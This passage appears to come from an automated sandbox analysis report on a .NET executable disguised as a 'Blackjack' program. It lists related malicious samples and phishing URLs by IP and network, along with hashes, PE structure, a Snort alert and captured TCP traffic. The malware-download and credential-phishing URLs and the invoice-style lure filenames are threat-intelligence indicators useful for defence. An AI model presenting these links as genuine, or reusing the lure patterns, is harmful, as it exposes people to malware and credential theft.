                                                    • 198.185.159.144
                                                    http://39unitedfrkesokoriorimiwsdystreetsmghg.duckdns.org/chnsfrnd1/vbc.exeGet hashmaliciousBrowse
                                                    • 198.185.159.145
                                                    sample.exeGet hashmaliciousBrowse
                                                    • 198.49.23.145
                                                    bXdiOPDmyZ.exeGet hashmaliciousBrowse
                                                    • 198.185.159.144
                                                    ZN10856678GB.exeGet hashmaliciousBrowse
                                                    • 198.185.159.144
                                                    document2811.exeGet hashmaliciousBrowse
                                                    • 198.185.159.144
                                                    15Delivery_Notification_00562947.doc.jsGet hashmaliciousBrowse
                                                    • 198.49.23.145
                                                    15Delivery_Notification_00562947.doc.jsGet hashmaliciousBrowse
                                                    • 198.185.159.145
                                                    http://curated.fieldtest.cc/Get hashmaliciousBrowse
                                                    • 198.185.159.144
                                                    prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.comPurchase Order 40,7045$.exeGet hashmaliciousBrowse
                                                    • 3.12.202.18
                                                    Payment Advice - Advice Ref GLV823990339.exeGet hashmaliciousBrowse
                                                    • 3.134.22.63
                                                    udtiZ6qM4s.exeGet hashmaliciousBrowse
                                                    • 3.12.202.18
                                                    uM0FDMSqE2.exeGet hashmaliciousBrowse
                                                    • 3.12.202.18
                                                    new file.exe.exeGet hashmaliciousBrowse
                                                    • 3.12.202.18
                                                    jrzlwOa0UC.exeGet hashmaliciousBrowse
                                                    • 3.134.22.63
                                                    9Ul8m9FQ47.exeGet hashmaliciousBrowse
                                                    • 3.138.72.189
                                                    XCnhrl4qRO.exeGet hashmaliciousBrowse
                                                    • 3.12.202.18
                                                    feJbFA6woA.exeGet hashmaliciousBrowse
                                                    • 3.138.72.189
                                                    RfqYEW3Oc5.exeGet hashmaliciousBrowse
                                                    • 3.138.72.189
                                                    w4fNtjZBEH.exeGet hashmaliciousBrowse
                                                    • 3.12.202.18
                                                    Purchase Order 40,7045$.exeGet hashmaliciousBrowse
                                                    • 3.12.202.18
                                                    sXNQG9jqhR.exeGet hashmaliciousBrowse
                                                    • 3.12.202.18
                                                    0VikCnzrVT.exeGet hashmaliciousBrowse
                                                    • 3.134.22.63
                                                    Purchase Order 40,7045$.exeGet hashmaliciousBrowse
                                                    • 3.138.72.189
                                                    SOA109216.exeGet hashmaliciousBrowse
                                                    • 3.134.22.63
                                                    KZ7qjnBlZF.exeGet hashmaliciousBrowse
                                                    • 3.134.22.63
                                                    scnn7676766.exeGet hashmaliciousBrowse
                                                    • 3.138.72.189
                                                    PI41006.exeGet hashmaliciousBrowse
                                                    • 3.18.25.61
                                                    M11sVPvWUT.exeGet hashmaliciousBrowse
                                                    • 3.18.25.61

                                                    ASN

                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                    GOOGLEUScom.fdhgkjhrtjkjbx.model.apkGet hashmaliciousBrowse
                                                    • 216.58.212.163
                                                    http://www.portal.office.com.s3-website.us-east-2.amazonaws.com#p.steinberger@wafra.comGet hashmaliciousBrowse
                                                    • 172.217.16.193
                                                    https://storage.googleapis.com/storesll0f4bb6d9b7f964569155d2bb42628/a83416219a20d87f4dabde9f057f93b5.html#p.steinberger@wafra.comGet hashmaliciousBrowse
                                                    • 172.217.16.193
                                                    https://docs.google.com/document/d/e/2PACX-1vS19QxlBmfgZPBsUyM3LjkhvVA-TJ0Z_P3J8f_cqg7VN4_zRcrthLeTjZzAubcBh9YWnC0ty3FtmofH/pubGet hashmaliciousBrowse
                                                    • 172.217.16.193
                                                    https://sites.google.com/site/id500800931/googledrive/share/downloads/storage?FID=6937265496484Get hashmaliciousBrowse
                                                    • 172.217.16.193
                                                    https://docs.google.com/document/d/e/2PACX-1vSF_0NxJ4W_JaHZNaHV7imTfN6FtP563leR3WEEVqre35gDV9YM55P9l-6Y-B1gmL7J7GW--QSF89LQ/pubGet hashmaliciousBrowse
                                                    • 172.217.16.193
                                                    https://largemail.r1.rpost.net/files/7xU97qcFgCvB3Uv1wDC4qvS2ZriLfublohKWA5V3/ln/en-usGet hashmaliciousBrowse
                                                    • 172.217.23.161
                                                    http://s1022.t.en25.com/e/er?s=1022&lid=2184&elqTrackId=BEDFF87609C7D9DEAD041308DD8FFFB8&lb_email=bkirwer%40farbestfoods.com&elq=b095bd096fb54161953a2cf8316b5d13&elqaid=3115&elqat=1Get hashmaliciousBrowse
                                                    • 172.217.21.195
                                                    https://bit.ly/35MTO80Get hashmaliciousBrowse
                                                    • 172.217.23.161
                                                    Order List.xlsxGet hashmaliciousBrowse
                                                    • 34.102.136.180
                                                    BANK ACCOUNT INFO!.exeGet hashmaliciousBrowse
                                                    • 35.230.2.159
                                                    http://global.krx.co.kr/board/GLB0205020100/bbs#view=649Get hashmaliciousBrowse
                                                    • 108.177.15.155
                                                    Purchase Order 40,7045$.exeGet hashmaliciousBrowse
                                                    • 34.102.136.180
                                                    invoice.exeGet hashmaliciousBrowse
                                                    • 34.102.136.180
                                                    TR-D45.pdf.exeGet hashmaliciousBrowse
                                                    • 34.102.136.180
                                                    knitted yarn documents.exeGet hashmaliciousBrowse
                                                    • 172.253.120.109
                                                    86dXpRWnFG.exeGet hashmaliciousBrowse
                                                    • 34.102.136.180
                                                    https://kimiyasanattools.com/outlook/latest-onedrive/microsoft.phpGet hashmaliciousBrowse
                                                    • 172.217.16.130
                                                    b0408bca49c87f9e54bce76565bc6518.exeGet hashmaliciousBrowse
                                                    • 74.125.34.46
                                                    b2e3bd67d738988ca1bbed8d8b3e73fc.exeGet hashmaliciousBrowse
                                                    • 74.125.34.46
                                                    NAMECHEAP-NETUShttp://rwiqipwvnklaqkuu.ltiliqhting.com/asci/SmFjcXVlbGluZS5TY2hyYWRlckByYWJvYmFuay5jb20=Get hashmaliciousBrowse
                                                    • 198.54.120.245
                                                    Payment conflict- aptiv 082920134110.htmGet hashmaliciousBrowse
                                                    • 198.54.116.10
                                                    Payment-244581781.docGet hashmaliciousBrowse
                                                    • 198.187.29.39
                                                    Order List.xlsxGet hashmaliciousBrowse
                                                    • 198.54.117.216
                                                    https://u19114248.ct.sendgrid.net/ls/click?upn=1kMFt-2Foese19BdzKqBBNxmUiDNiO3l4ozyKR3JHYHjGXyXtR1YgfLizwybC7hwFoy4wlb-2FUZczInc9Ssmzz4dQ-3D-3DuU6r_TCf26aIMQHFUMJSqtVnzlcWBqfQpkiFxCOBj9heiSevnqRkiapxQjkatt3r5u5xw-2FNDgXhA220pIRwcKmyMneET98pBkuhL-2FUwJCaSrvE5mZhnMBtJdZf9Opljklq5t7Y-2BINqElPIJU8bjYLY27qV6L-2FSwA36husfmMqwKagSwOgE04FdniEmY9uEbym50XNhqKw9lgczv6HrSrYNm6ouXnIayW-2FSBLzGYxoTYKe6OA-3DGet hashmaliciousBrowse
                                                    • 198.54.114.178
                                                    Certificates Profile Details Of Our Company And About Us.exeGet hashmaliciousBrowse
                                                    • 198.54.122.60
                                                    Final-Payment-Receipt.exeGet hashmaliciousBrowse
                                                    • 162.0.236.49
                                                    Payment Advice.xlsGet hashmaliciousBrowse
                                                    • 185.61.154.32
                                                    Payment Advice.xlsGet hashmaliciousBrowse
                                                    • 185.61.154.32
                                                    Payment Advice.xlsGet hashmaliciousBrowse
                                                    • 185.61.154.32
                                                    Documentation.478396766.docGet hashmaliciousBrowse
                                                    • 198.187.31.83
                                                    Documentation.478396766.docGet hashmaliciousBrowse
                                                    • 192.64.118.88
                                                    tl2gnGyMz6eLhZG.exeGet hashmaliciousBrowse
                                                    • 104.219.248.45
                                                    Purchase Order 40,7045.exeGet hashmaliciousBrowse
                                                    • 185.61.154.55
                                                    74725794.no.exeGet hashmaliciousBrowse
                                                    • 198.54.122.60
                                                    Payment Advice - Advice Ref GLV823990339.exeGet hashmaliciousBrowse
                                                    • 198.54.120.58
                                                    invoice payment.exeGet hashmaliciousBrowse
                                                    • 185.61.154.32
                                                    Certificates Profile Details Of Our Company.exeGet hashmaliciousBrowse
                                                    • 198.54.122.60
                                                    https://lfonoumkgl.zizera.com/FXGet hashmaliciousBrowse
                                                    • 199.188.200.253
                                                    xgarnica.exeGet hashmaliciousBrowse
                                                    • 198.54.122.60
                                                    SQUARESPACEUSkayx.exeGet hashmaliciousBrowse
                                                    • 198.185.159.141
                                                    BANK ACCOUNT INFO!.exeGet hashmaliciousBrowse
                                                    • 198.49.23.141
                                                    http://WWW.ALYSSA-J-MILANO.COMGet hashmaliciousBrowse
                                                    • 198.185.159.141
                                                    Payment Advice - Advice Ref GLV823990339.exeGet hashmaliciousBrowse
                                                    • 198.49.23.141
                                                    baf6b9fcec491619b45c1dd7db56ad3d.exeGet hashmaliciousBrowse
                                                    • 198.49.23.177
                                                    http://f69e.engage.squarespace-mail.comGet hashmaliciousBrowse
                                                    • 198.49.23.141
                                                    NEW PO.exeGet hashmaliciousBrowse
                                                    • 198.185.159.141
                                                    p8LV1eVFyO.exeGet hashmaliciousBrowse
                                                    • 198.49.23.177
                                                    dB7XQuemMc.exeGet hashmaliciousBrowse
                                                    • 198.49.23.141
                                                    hRVrTsMv25.exeGet hashmaliciousBrowse
                                                    • 198.49.23.141
                                                    qkN4OZWFG6.exeGet hashmaliciousBrowse
                                                    • 198.185.159.144
                                                    kvdYhqN3Nh.exeGet hashmaliciousBrowse
                                                    • 198.185.159.144
                                                    NzI1oP5E74.exeGet hashmaliciousBrowse
                                                    • 198.49.23.141
                                                    IQtvZjIdhN.exeGet hashmaliciousBrowse
                                                    • 198.49.23.177
                                                    PO.exeGet hashmaliciousBrowse
                                                    • 198.49.23.141
                                                    148wWoi8vI.exeGet hashmaliciousBrowse
                                                    • 198.49.23.177
                                                    H4A2-423-EM154-302.exeGet hashmaliciousBrowse
                                                    • 198.185.159.141
                                                    KZ7qjnBlZF.exeGet hashmaliciousBrowse
                                                    • 198.49.23.141
                                                    scnn7676766.exeGet hashmaliciousBrowse
                                                    • 198.185.159.144
                                                    price quote.exeGet hashmaliciousBrowse
                                                    • 198.185.159.145

                                                    JA3 Fingerprints

                                                    No context

                                                    Dropped Files

                                                    No context

                                                    Created / dropped Files

                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\vOKMFxiCYt.exe.log
                                                    Process:C:\Users\user\Desktop\vOKMFxiCYt.exe
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):1314
                                                    Entropy (8bit):5.350128552078965
                                                    Encrypted:false
                                                    SSDEEP:24:MLU84jE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4sAmEw:MgvjHK5HKXE1qHiYHKhQnoPtHoxHhAHR
                                                    MD5:1DC1A2DCC9EFAA84EABF4F6D6066565B
                                                    SHA1:B7FCF805B6DD8DE815EA9BC089BD99F1E617F4E9
                                                    SHA-256:28D63442C17BF19558655C88A635CB3C3FF1BAD1CCD9784090B9749A7E71FCEF
                                                    SHA-512:95DD7E2AB0884A3EFD9E26033B337D1F97DDF9A8E9E9C4C32187DCD40622D8B1AC8CCDBA12A70A6B9075DF5E7F68DF2F8FBA4AB33DB4576BE9806B8E191802B7
                                                    Malicious:true
                                                    Reputation:high, very likely benign file
                                                    Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

                                                    Static File Info

                                                    General

                                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Entropy (8bit):7.6186010890207205
                                                    TrID:
                                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                    • Win32 Executable (generic) a (10002005/4) 49.75%
                                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                    • Windows Screen Saver (13104/52) 0.07%
                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                    File name:vOKMFxiCYt.exe
                                                    File size:711168
                                                    MD5:bb30a5dd4130b071fb4ca5f005371c63
                                                    SHA1:52c3ca02828a4ad8e8dbf790a61b3d77379ad391
                                                    SHA256:4c73fd4286e76a094eefafe5369f3a184ca4a38d567ae6dfad61645bf968a83f
                                                    SHA512:062f184dea6b1327418b7030b114cc40bf21072408fb9408bc18b823bce73534cf513a566ef16f90c0379581fb9e189d8d39614334c04c1607afbc02089ac0d1
                                                    SSDEEP:12288:8uuG4MYHtSghDUtXrVNRk6ivKdKPWD4axof2YwhOT6lt6CjC2rPTVeOywSXvAfC:bjYMghDOXrK64KdIw4aVD82
                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....'._..............P.............n.... ........@.. ....................... ............@................................

                                                    File Icon

                                                    Icon Hash:68f4d4f0f0f0d8c4

                                                    Static PE Info

                                                    General

                                                    Entrypoint:0x4ad96e
                                                    Entrypoint Section:.text
                                                    Digitally signed:false
                                                    Imagebase:0x400000
                                                    Subsystem:windows gui
                                                    Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                    DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                    Time Stamp:0x5FB627B3 [Thu Nov 19 08:07:15 2020 UTC]
                                                    TLS Callbacks:
                                                    CLR (.Net) Version:v4.0.30319
                                                    OS Version Major:4
                                                    OS Version Minor:0
                                                    File Version Major:4
                                                    File Version Minor:0
                                                    Subsystem Version Major:4
                                                    Subsystem Version Minor:0
                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                    Entrypoint Preview

                                                    Instruction
                                                    jmp dword ptr [00402000h]
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al

                                                    Data Directories

                                                    NameVirtual AddressVirtual Size Is in Section
                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0xad91c0x4f.text
                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0xae0000x1a20.rsrc
                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0xb00000xc.reloc
                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                    Sections

                                                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                    .text0x20000xab9740xaba00False0.796825211672data7.62841280925IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                    .rsrc0xae0000x1a200x1c00False0.759068080357data6.77634039509IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                    .reloc0xb00000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                    Resources

                                                    NameRVASizeTypeLanguageCountry
                                                    RT_ICON0xae1300x13dePNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                                    RT_GROUP_ICON0xaf5100x14data
                                                    RT_VERSION0xaf5240x30cdata
                                                    RT_MANIFEST0xaf8300x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                    Imports

                                                    DLLImport
                                                    mscoree.dll_CorExeMain

                                                    Version Infos

                                                    DescriptionData
                                                    Translation0x0000 0x04b0
                                                    LegalCopyrightCopyright 2014
                                                    Assembly Version1.0.0.0
                                                    InternalNameLqei.exe
                                                    FileVersion1.0.0.0
                                                    CompanyName
                                                    LegalTrademarks
                                                    Comments
                                                    ProductNameBlackjack
                                                    ProductVersion1.0.0.0
                                                    FileDescriptionBlackjack
                                                    OriginalFilenameLqei.exe

                                                    Network Behavior

                                                    Snort IDS Alerts

                                                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                    11/20/20-20:05:47.333897TCP1201ATTACK-RESPONSES 403 Forbidden804973734.102.136.180192.168.2.3

                                                    Network Port Distribution

                                                    TCP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Nov 20, 2020 20:05:26.573868990 CET4972880192.168.2.33.138.72.189
                                                    Nov 20, 2020 20:05:26.686641932 CET80497283.138.72.189192.168.2.3
                                                    Nov 20, 2020 20:05:26.686763048 CET4972880192.168.2.33.138.72.189
                                                    Nov 20, 2020 20:05:26.687122107 CET4972880192.168.2.33.138.72.189
                                                    Nov 20, 2020 20:05:26.799868107 CET80497283.138.72.189192.168.2.3
                                                    Nov 20, 2020 20:05:26.800371885 CET80497283.138.72.189192.168.2.3
                                                    Nov 20, 2020 20:05:26.800390959 CET80497283.138.72.189192.168.2.3
                                                    Nov 20, 2020 20:05:26.800730944 CET4972880192.168.2.33.138.72.189
                                                    Nov 20, 2020 20:05:26.800884962 CET4972880192.168.2.33.138.72.189
                                                    Nov 20, 2020 20:05:26.913804054 CET80497283.138.72.189192.168.2.3
                                                    Nov 20, 2020 20:05:47.201289892 CET4973780192.168.2.334.102.136.180
                                                    Nov 20, 2020 20:05:47.217951059 CET804973734.102.136.180192.168.2.3
                                                    Nov 20, 2020 20:05:47.218205929 CET4973780192.168.2.334.102.136.180
                                                    Nov 20, 2020 20:05:47.218628883 CET4973780192.168.2.334.102.136.180
                                                    Nov 20, 2020 20:05:47.235160112 CET804973734.102.136.180192.168.2.3
                                                    Nov 20, 2020 20:05:47.333897114 CET804973734.102.136.180192.168.2.3
                                                    Nov 20, 2020 20:05:47.333945990 CET804973734.102.136.180192.168.2.3
                                                    Nov 20, 2020 20:05:47.334137917 CET4973780192.168.2.334.102.136.180
                                                    Nov 20, 2020 20:05:47.334182978 CET4973780192.168.2.334.102.136.180
                                                    Nov 20, 2020 20:05:47.350737095 CET804973734.102.136.180192.168.2.3
                                                    Nov 20, 2020 20:06:07.638340950 CET4973980192.168.2.3198.49.23.141
                                                    Nov 20, 2020 20:06:07.740331888 CET8049739198.49.23.141192.168.2.3
                                                    Nov 20, 2020 20:06:07.740473032 CET4973980192.168.2.3198.49.23.141
                                                    Nov 20, 2020 20:06:07.740803957 CET4973980192.168.2.3198.49.23.141
                                                    Nov 20, 2020 20:06:07.842596054 CET8049739198.49.23.141192.168.2.3
                                                    Nov 20, 2020 20:06:07.845019102 CET8049739198.49.23.141192.168.2.3
                                                    Nov 20, 2020 20:06:07.845062017 CET8049739198.49.23.141192.168.2.3
                                                    Nov 20, 2020 20:06:07.845097065 CET8049739198.49.23.141192.168.2.3
                                                    Nov 20, 2020 20:06:07.845140934 CET8049739198.49.23.141192.168.2.3
                                                    Nov 20, 2020 20:06:07.845160007 CET4973980192.168.2.3198.49.23.141
                                                    Nov 20, 2020 20:06:07.845180035 CET8049739198.49.23.141192.168.2.3
                                                    Nov 20, 2020 20:06:07.845208883 CET4973980192.168.2.3198.49.23.141
                                                    Nov 20, 2020 20:06:07.845216036 CET8049739198.49.23.141192.168.2.3
                                                    Nov 20, 2020 20:06:07.845251083 CET8049739198.49.23.141192.168.2.3
                                                    Nov 20, 2020 20:06:07.845271111 CET4973980192.168.2.3198.49.23.141
                                                    Nov 20, 2020 20:06:07.845287085 CET8049739198.49.23.141192.168.2.3
                                                    Nov 20, 2020 20:06:07.845320940 CET8049739198.49.23.141192.168.2.3
                                                    Nov 20, 2020 20:06:07.845355988 CET8049739198.49.23.141192.168.2.3
                                                    Nov 20, 2020 20:06:07.845359087 CET4973980192.168.2.3198.49.23.141
                                                    Nov 20, 2020 20:06:07.845417023 CET4973980192.168.2.3198.49.23.141
                                                    Nov 20, 2020 20:06:07.947180033 CET8049739198.49.23.141192.168.2.3
                                                    Nov 20, 2020 20:06:07.947225094 CET8049739198.49.23.141192.168.2.3
                                                    Nov 20, 2020 20:06:07.947264910 CET8049739198.49.23.141192.168.2.3
                                                    Nov 20, 2020 20:06:07.947304964 CET8049739198.49.23.141192.168.2.3
                                                    Nov 20, 2020 20:06:07.947346926 CET4973980192.168.2.3198.49.23.141
                                                    Nov 20, 2020 20:06:07.947355986 CET8049739198.49.23.141192.168.2.3
                                                    Nov 20, 2020 20:06:07.947400093 CET8049739198.49.23.141192.168.2.3
                                                    Nov 20, 2020 20:06:07.947413921 CET4973980192.168.2.3198.49.23.141
                                                    Nov 20, 2020 20:06:07.947438002 CET8049739198.49.23.141192.168.2.3
                                                    Nov 20, 2020 20:06:07.947479963 CET4973980192.168.2.3198.49.23.141
                                                    Nov 20, 2020 20:06:07.947495937 CET8049739198.49.23.141192.168.2.3
                                                    Nov 20, 2020 20:06:07.947539091 CET8049739198.49.23.141192.168.2.3
                                                    Nov 20, 2020 20:06:07.947577000 CET8049739198.49.23.141192.168.2.3
                                                    Nov 20, 2020 20:06:07.947582960 CET4973980192.168.2.3198.49.23.141
                                                    Nov 20, 2020 20:06:07.947617054 CET8049739198.49.23.141192.168.2.3
                                                    Nov 20, 2020 20:06:07.947632074 CET4973980192.168.2.3198.49.23.141
                                                    Nov 20, 2020 20:06:07.947655916 CET8049739198.49.23.141192.168.2.3
                                                    Nov 20, 2020 20:06:07.947694063 CET8049739198.49.23.141192.168.2.3
                                                    Nov 20, 2020 20:06:07.947731972 CET8049739198.49.23.141192.168.2.3
                                                    Nov 20, 2020 20:06:07.947767973 CET4973980192.168.2.3198.49.23.141
                                                    Nov 20, 2020 20:06:07.947770119 CET8049739198.49.23.141192.168.2.3
                                                    Nov 20, 2020 20:06:07.947818995 CET8049739198.49.23.141192.168.2.3
                                                    Nov 20, 2020 20:06:07.947850943 CET4973980192.168.2.3198.49.23.141
                                                    Nov 20, 2020 20:06:07.947861910 CET8049739198.49.23.141192.168.2.3
                                                    Nov 20, 2020 20:06:07.947900057 CET8049739198.49.23.141192.168.2.3
                                                    Nov 20, 2020 20:06:07.947900057 CET4973980192.168.2.3198.49.23.141
                                                    Nov 20, 2020 20:06:07.947940111 CET8049739198.49.23.141192.168.2.3
                                                    Nov 20, 2020 20:06:07.947969913 CET4973980192.168.2.3198.49.23.141
                                                    Nov 20, 2020 20:06:07.947978973 CET8049739198.49.23.141192.168.2.3
                                                    Nov 20, 2020 20:06:07.948054075 CET4973980192.168.2.3198.49.23.141
                                                    Nov 20, 2020 20:06:08.049653053 CET8049739198.49.23.141192.168.2.3
                                                    Nov 20, 2020 20:06:08.049686909 CET8049739198.49.23.141192.168.2.3
                                                    Nov 20, 2020 20:06:08.049711943 CET8049739198.49.23.141192.168.2.3
                                                    Nov 20, 2020 20:06:08.049737930 CET8049739198.49.23.141192.168.2.3
                                                    Nov 20, 2020 20:06:08.049762011 CET8049739198.49.23.141192.168.2.3
                                                    Nov 20, 2020 20:06:08.049788952 CET8049739198.49.23.141192.168.2.3
                                                    Nov 20, 2020 20:06:08.049796104 CET4973980192.168.2.3198.49.23.141
                                                    Nov 20, 2020 20:06:08.049814939 CET8049739198.49.23.141192.168.2.3
                                                    Nov 20, 2020 20:06:08.049840927 CET8049739198.49.23.141192.168.2.3
                                                    Nov 20, 2020 20:06:08.049865007 CET8049739198.49.23.141192.168.2.3
                                                    Nov 20, 2020 20:06:08.049890041 CET8049739198.49.23.141192.168.2.3
                                                    Nov 20, 2020 20:06:08.049913883 CET8049739198.49.23.141192.168.2.3
                                                    Nov 20, 2020 20:06:08.049937010 CET8049739198.49.23.141192.168.2.3
                                                    Nov 20, 2020 20:06:08.049961090 CET8049739198.49.23.141192.168.2.3
                                                    Nov 20, 2020 20:06:08.049987078 CET8049739198.49.23.141192.168.2.3
                                                    Nov 20, 2020 20:06:08.049988985 CET4973980192.168.2.3198.49.23.141
                                                    Nov 20, 2020 20:06:08.050012112 CET8049739198.49.23.141192.168.2.3
                                                    Nov 20, 2020 20:06:08.050035000 CET8049739198.49.23.141192.168.2.3
                                                    Nov 20, 2020 20:06:08.050057888 CET8049739198.49.23.141192.168.2.3
                                                    Nov 20, 2020 20:06:08.050080061 CET8049739198.49.23.141192.168.2.3
                                                    Nov 20, 2020 20:06:08.050084114 CET4973980192.168.2.3198.49.23.141
                                                    Nov 20, 2020 20:06:08.050103903 CET8049739198.49.23.141192.168.2.3
                                                    Nov 20, 2020 20:06:08.050144911 CET8049739198.49.23.141192.168.2.3
                                                    Nov 20, 2020 20:06:08.050153017 CET4973980192.168.2.3198.49.23.141
                                                    Nov 20, 2020 20:06:08.050172091 CET8049739198.49.23.141192.168.2.3
                                                    Nov 20, 2020 20:06:08.050195932 CET8049739198.49.23.141192.168.2.3
                                                    Nov 20, 2020 20:06:08.050219059 CET8049739198.49.23.141192.168.2.3
                                                    Nov 20, 2020 20:06:08.050241947 CET8049739198.49.23.141192.168.2.3
                                                    Nov 20, 2020 20:06:08.050255060 CET4973980192.168.2.3198.49.23.141
                                                    Nov 20, 2020 20:06:08.050273895 CET8049739198.49.23.141192.168.2.3
                                                    Nov 20, 2020 20:06:08.050297976 CET8049739198.49.23.141192.168.2.3
                                                    Nov 20, 2020 20:06:08.050333023 CET8049739198.49.23.141192.168.2.3
                                                    Nov 20, 2020 20:06:08.050340891 CET4973980192.168.2.3198.49.23.141
